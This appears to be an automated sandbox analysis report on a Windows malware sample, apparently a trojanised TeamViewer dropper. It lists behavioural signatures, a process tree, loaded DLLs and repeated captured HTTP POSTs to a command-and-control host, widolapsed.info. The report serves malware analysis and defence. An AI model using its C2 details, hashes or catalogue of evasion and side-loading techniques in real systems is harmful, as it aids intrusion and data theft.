Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name:wogZe27GBB (renamed file extension from none to exe)
Analysis ID:483790
MD5:5efc68abd7fec415e34980d95a06a66a
SHA1:34b243a0b3e322b8983b528caa5849395360a91d
SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags:exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6736 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7104 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4884 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4600 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3888 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3864 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3348 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6028 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6252 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4912 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 6524 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: wogZe27GBB.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76426Content-Type: multipart/form-data; boundary=--------974736809User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81223Content-Type: multipart/form-data; boundary=--------1733772180User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81262Content-Type: multipart/form-data; boundary=--------3571177622User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81298Content-Type: multipart/form-data; boundary=--------3135628383User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83326Content-Type: multipart/form-data; boundary=--------2112300367User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83305Content-Type: multipart/form-data; boundary=--------1747900146User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83526Content-Type: multipart/form-data; boundary=--------4043093276User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81257Content-Type: multipart/form-data; boundary=--------4228739266User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81331Content-Type: multipart/form-data; boundary=--------3803026718User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81307Content-Type: multipart/form-data; boundary=--------2963325791User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85135Content-Type: multipart/form-data; boundary=--------2571491142User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 82926Content-Type: multipart/form-data; boundary=--------3335732562User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83052Content-Type: multipart/form-data; boundary=--------1291895716User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76682Content-Type: multipart/form-data; boundary=--------1315708494User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76660Content-Type: multipart/form-data; boundary=--------3047557173User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76627Content-Type: multipart/form-data; boundary=--------3142017803User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76637Content-Type: multipart/form-data; boundary=--------2197444700User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76633Content-Type: multipart/form-data; boundary=--------327613734User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76617Content-Type: multipart/form-data; boundary=--------3156620313User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------2353964795User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------2524520363User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76647Content-Type: multipart/form-data; boundary=--------776738021User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------1255899435User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76639Content-Type: multipart/form-data; boundary=--------3577760510User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76833Content-Type: multipart/form-data; boundary=--------4017631281User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76635Content-Type: multipart/form-data; boundary=--------3576073818User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76584Content-Type: multipart/form-data; boundary=--------2060090614User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76670Content-Type: multipart/form-data; boundary=--------1263745405User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------3327901999User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------1002864139User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76582Content-Type: multipart/form-data; boundary=--------795614568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76736Content-Type: multipart/form-data; boundary=--------572333967User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76592Content-Type: multipart/form-data; boundary=--------3756762824User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76612Content-Type: multipart/form-data; boundary=--------4010773262User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------1730318477User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76649Content-Type: multipart/form-data; boundary=--------2667398164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76622Content-Type: multipart/form-data; boundary=--------2156489369User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76630Content-Type: multipart/form-data; boundary=--------271647860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------2981659231User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76646Content-Type: multipart/form-data; boundary=--------3817058548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76655Content-Type: multipart/form-data; boundary=--------1585944860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76672Content-Type: multipart/form-data; boundary=--------1049848244User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------3157952906User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
